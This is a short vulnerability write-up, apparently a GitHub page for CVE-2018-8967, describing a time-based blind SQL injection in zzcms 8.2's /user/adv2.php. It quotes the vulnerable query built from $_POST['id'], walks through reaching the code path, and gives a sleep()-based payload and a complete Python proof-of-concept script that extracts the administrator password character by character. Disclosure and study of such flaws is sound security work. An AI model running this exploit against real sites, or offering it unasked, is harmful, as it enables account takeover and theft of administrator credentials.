CVE-2018-8967: vulnerability/adv2.php.md at master · Ni9htMar3/vulnerability

Permalink

Cannot retrieve contributors at this time

title

tags

grammar_cjkRuby

adv2.php

新建,模板,小书匠

true

/user/adv2.php****Edition :

zzcms 8.2

Location

/user/adv2.php

Code:

$rs=query(“select * from zzcms_ad where id=".$_POST[“id”]."”);

Rows : 72****Harm

Can get password through SQl injection

Cause the cause

Take a look at the logic of the bug, first slowly back up and found that need to enter here first and need to make a, c not all 0

That is to say, let zzcms_main or zzcms_zh have a value. Adding it directly tells the user that they do not have permission.In this case, directly POST

Then go back and find that need to let action=modify

At this point , first debug it, directly in phpstorm debugging id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0), found that there really is Delay.

poc

import requests import string s = requests.session() url = “http://127.0.0.1:8080/user/adv2.php?action=modify” cookies = { ‘UserName’:’test2’ } flag = ‘’ for i in range(1,40): for j in range(33,125): data = { 'id’:’0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'.format(i,j) } #print data r = s.post(url,data=data,cookies=cookies) #print r.text sec=r.elapsed.seconds #print i,j,sec if sec >2: flag += chr(j) print flag break print flag

Get the administrator password